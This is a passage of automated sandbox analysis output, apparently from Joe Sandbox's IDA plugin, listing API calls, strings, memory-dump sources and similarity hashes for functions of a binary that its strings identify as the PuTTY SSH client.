                    • ___from_strstr_to_strchr.LIBCMT ref: 00BE31DB
                    Strings
                    • ecdh,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1, xrefs: 00BE0C8D, 00BE30D3
                    • TerminalModes, xrefs: 00BE30FD, 00BE310D
                    • ecdh,dh-gex-sha1,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1, xrefs: 00BE0C92, 00BE0D0A, 00BE30D1
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: TerminalModes$ecdh,dh-gex-sha1,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1$ecdh,dh-group18-sha512,dh-group17-sha512,dh-group16-sha512,dh-group15-sha512,dh-group14-sha1,rsa,WARN,dh-group1-sha1,dh-gex-sha1
                    • API String ID: 601868998-4179141825
                    • Opcode ID: 9c9e972b98ff28253b671f3b13f49b0f3516c51b2007cf3ac95e0bd50104c811
                    • Instruction ID: b65168908e24d40bf6ebf742545318049a62f7491716bf1753bd97b449aaa816
                    • Opcode Fuzzy Hash: 9c9e972b98ff28253b671f3b13f49b0f3516c51b2007cf3ac95e0bd50104c811
                    • Instruction Fuzzy Hash: F13125F69042C82BE72011272C96B7736D98F92B49F5900ECFD8967243FB1A9E049273
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strcat_strlen
                    • String ID: %.*s $INVALID-ALGORITHM$VUUU
                    • API String ID: 432593777-4136275203
                    • Opcode ID: 155a440bc566c194fded625be71b0b3a130cd4128570d9767701401dbc2fe5e1
                    • Instruction ID: 385968021d772f2a4dd62afb7448834ab3f643fa23dcfcfda1bb43d9cc786f8d
                    • Opcode Fuzzy Hash: 155a440bc566c194fded625be71b0b3a130cd4128570d9767701401dbc2fe5e1
                    • Instruction Fuzzy Hash: F431E3B19083186FD304EF19EC81B9BB7D8AB85348F04453DF88987242E674DA489BD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BF9440: GetLocalTime.KERNEL32(?,?,?,?,00BD4A24,?), ref: 00BF9456
                    • _strftime.LIBCMT ref: 00BCEC09
                    • SendDlgItemMessageA.USER32(?,000003E9,00000180,00000000,00000000), ref: 00BCEC88
                    • SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 00BCEC9E
                    • SendDlgItemMessageA.USER32(000003E9,00000197,-000000FF,00000000), ref: 00BCECB6
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend$LocalTime_strftime
                    • String ID: %Y-%m-%d %H:%M:%S
                    • API String ID: 3243744690-819171244
                    • Opcode ID: 26ea033d1bf0943d3731fc06ea7411b4414795db302fcf9215644d9120a1de2d
                    • Instruction ID: 30d4f3aa22119339b99b53274a82786a4ac8058e2e7888ac943b91e61815d444
                    • Opcode Fuzzy Hash: 26ea033d1bf0943d3731fc06ea7411b4414795db302fcf9215644d9120a1de2d
                    • Instruction Fuzzy Hash: 173121B1A00200EBE700AB24FC92F2E37E5EB69714F584768F855EB3E0D671E904CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,?,00BE4659), ref: 00BE4AFB
                    • DeleteFileA.KERNEL32(00000000,00000002,00000000,?,00BE4659), ref: 00BE4B0C
                    • GetLastError.KERNEL32 ref: 00BE4B16
                    • GetLastError.KERNEL32 ref: 00BE4B21
                    Strings
                    • Unable to delete '%s': %s, xrefs: 00BE4B32
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorFileLast$CreateDelete
                    • String ID: Unable to delete '%s': %s
                    • API String ID: 3657518308-26304762
                    • Opcode ID: 0826945e86b111b1615d6d28e1852b4139f118ba31738b7bcbfdca4b0564115d
                    • Instruction ID: e6687f0d4600979091a0e30c207327aa9881440d20a980eabe2c3c745d601092
                    • Opcode Fuzzy Hash: 0826945e86b111b1615d6d28e1852b4139f118ba31738b7bcbfdca4b0564115d
                    • Instruction Fuzzy Hash: F501F4B12042526BE7182B756C8AFAF36EDDBC5329F240A28F427C3184EB608D518665
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6DF90071,?,?,00000000,00C760A4,000000FF,?,00C5A4FA,00C5A395,?,00C5A596,00000000), ref: 00C5A465
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C5A477
                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00C760A4,000000FF,?,00C5A4FA,00C5A395,?,00C5A596,00000000), ref: 00C5A499
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 95bef7caf97348d3b16ab8c6f1704b1985b0f7c7c96b5fe94e6b8e7526503e65
                    • Instruction ID: 05b91d6dc759bae37078918aa57b378feec37fd0619a4e7272d05d060a802420
                    • Opcode Fuzzy Hash: 95bef7caf97348d3b16ab8c6f1704b1985b0f7c7c96b5fe94e6b8e7526503e65
                    • Instruction Fuzzy Hash: DB01D635910619FFCB029F90DC09BBEBBB8FB44B15F004625F822E26D0DBB49904CA98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ReleaseCapture.USER32(?,?,?,?,?,?,?,?,00BCDD0D,?,?,?), ref: 00BCF245
                    • GetWindowPlacement.USER32(?,?,?,?,?,?,?,?,?,?,00BCDD0D,?,?,?), ref: 00BCF29F
                    • SetWindowPlacement.USER32(?), ref: 00BCF2BA
                    • GetCapture.USER32 ref: 00BCF30C
                      • Part of subcall function 00BBB5C0: DeleteFileA.KERNEL32(?), ref: 00BBB5EA
                      • Part of subcall function 00BF8140: GetWindowLongA.USER32 ref: 00BF8164
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CapturePlacement$DeleteFileLongRelease
                    • String ID:
                    • API String ID: 2096018050-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GlobalLock.KERNEL32 ref: 00BB21AA
                    • _strlen.LIBCMT ref: 00BB2395
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BB23B0
                    • _strlen.LIBCMT ref: 00BB23C4
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00BB23D7
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide_strlen$GlobalLock
                    • String ID:
                    • API String ID: 2105387149-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowLongA.USER32 ref: 00BBA9DA
                    • SetWindowLongA.USER32 ref: 00BBAA39
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000027,?,?,?,00BB2D45,?,?,?), ref: 00BBAA51
                    • CheckMenuItem.USER32(00000180,00000000), ref: 00BBAA6A
                    • CheckMenuItem.USER32(00000180,00000000), ref: 00BBAA79
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$CheckItemLongMenu
                    • String ID:
                    • API String ID: 730651012-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsZoomed.USER32(00BB3EAE), ref: 00BBA8A6
                    • GetWindowLongA.USER32 ref: 00BBA8B8
                    • IsZoomed.USER32 ref: 00BBA8CB
                    • SendMessageA.USER32(00008003,00000000,00000000), ref: 00BBA8E9
                    • ShowWindow.USER32(00000003), ref: 00BBA8FB
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: WindowZoomed$LongMessageSendShow
                    • String ID:
                    • API String ID: 4028103791-0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: __freea
                    • String ID: a/p$am/pm
                    • API String ID: 240046367-3206640213
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    • client subnegotiation: SB TTYPE IS %s, xrefs: 00BDB35F
                    • server subnegotiation: SB TTYPE SEND, xrefs: 00BDB349
                    • server subnegotiation: SB TTYPE <something weird>, xrefs: 00BDB415
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID:
                    • String ID: client subnegotiation: SB TTYPE IS %s$server subnegotiation: SB TTYPE <something weird>$server subnegotiation: SB TTYPE SEND
                    • API String ID: 0-1023599780
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BCF180: SetWindowTextA.USER32(?,?), ref: 00BCF18F
                      • Part of subcall function 00BCF180: GetWindowLongA.USER32 ref: 00BCF1A1
                      • Part of subcall function 00BCF180: SetWindowLongA.USER32 ref: 00BCF1B0
                    • LoadIconA.USER32(000000C9), ref: 00BCEF4E
                    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00BCEF5D
                      • Part of subcall function 00BF93A0: GetDesktopWindow.USER32 ref: 00BF93B2
                      • Part of subcall function 00BF93A0: GetWindowRect.USER32 ref: 00BF93BE
                      • Part of subcall function 00BF93A0: GetWindowRect.USER32 ref: 00BF93D0
                      • Part of subcall function 00BF93A0: MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,7490B980,?,?,?,00BCD8AC,?), ref: 00BF941E
                      • Part of subcall function 00BCF6E0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00BCF70B
                      • Part of subcall function 00BCF6E0: GetClientRect.USER32(?,?), ref: 00BCF71D
                      • Part of subcall function 00BCF6E0: MapDialogRect.USER32(?), ref: 00BCF746
                    • ShowWindow.USER32(?,00000001), ref: 00BCF0D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Window$Rect$LongMessageSend$ClientDesktopDialogIconLoadMoveShowText
                    • String ID: Main
                    • API String ID: 174503319-521822810
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: from $SSHCONNECTION@putty.projects.tartarus.org-2.0-$connected%s%s
                    • API String ID: 4218353326-1458757670
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    • file format error, xrefs: 00C131F2
                    • nlines < MAX_KEY_BLOB_LINES, xrefs: 00C13238
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c, xrefs: 00C13233
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c$file format error$nlines < MAX_KEY_BLOB_LINES
                    • API String ID: 4218353326-1228660610
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDlgButtonChecked.USER32(?,?), ref: 00BD2D3B
                    Strings
                    • c && c->ctrl->type == CTRL_RADIO, xrefs: 00BD2D0C
                    • false && "no radio button was checked", xrefs: 00BD2D55
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c, xrefs: 00BD2D07, 00BD2D50
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ButtonChecked
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$c && c->ctrl->type == CTRL_RADIO$false && "no radio button was checked"
                    • API String ID: 1719414920-168353766
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • _strlen.LIBCMT ref: 00BFA98D
                    Strings
                    • SSHCONNECTION@putty.projects.tartarus.org-2.0-, xrefs: 00BFA97D
                    • !cs->sent_verstring, xrefs: 00BFA9D5
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/sharing.c, xrefs: 00BFA9D0
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID: !cs->sent_verstring$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/ssh/sharing.c$SSHCONNECTION@putty.projects.tartarus.org-2.0-
                    • API String ID: 1497175149-1639915603
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: BreakClearCloseCommHandle
                    • String ID: End of file reading from serial device$Error reading from serial device
                    • API String ID: 2685284230-2629609604
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Load$ClassCursorIconRegister
                    • String ID: MZx
                    • API String ID: 738324305-2575928145
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • PostQuitMessage.USER32(00000000), ref: 00BB6799
                    • ShowCursor.USER32(00000001), ref: 00BB67DD
                    • MessageBoxA.USER32 ref: 00BB67FD
                    Strings
                    • Connection closed by remote host, xrefs: 00BB67F2
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$CursorPostQuitShow
                    • String ID: Connection closed by remote host
                    • API String ID: 3394085358-3682140707
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ShowCursor.USER32(00000001), ref: 00BB63C9
                    • MessageBoxA.USER32 ref: 00BB63E0
                    • PostQuitMessage.USER32(00000001), ref: 00BB6416
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Message$CursorPostQuitShow
                    • String ID: %s Fatal Error
                    • API String ID: 3394085358-656502033
                    • Opcode ID: 0184973e92830e477205dfd3cd9b8d366165cb76fe850fb226344d9a5fe54dd1
                    • Instruction ID: ab7d6cb1631b24599ac4504d5ee621d08be18c36217a00d07a62c4cdf01ba4df
                    • Opcode Fuzzy Hash: 0184973e92830e477205dfd3cd9b8d366165cb76fe850fb226344d9a5fe54dd1
                    • Instruction Fuzzy Hash: DFF02875590340ABEB213722BC0BF9E3F94DB45719F180160F60A611F3EBE2485487E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00C5DB41: IsProcessorFeaturePresent.KERNEL32(00000017,00C5149B,?,?,?,?,00000000), ref: 00C5DB5D
                    • GetDC.USER32(00000000), ref: 00BB69DE
                    • SelectPalette.GDI32(00000000,00000000), ref: 00BB69F3
                    Strings
                    • /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/window.c, xrefs: 00BB69C0
                    • !wintw_hdc, xrefs: 00BB69C5
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmp
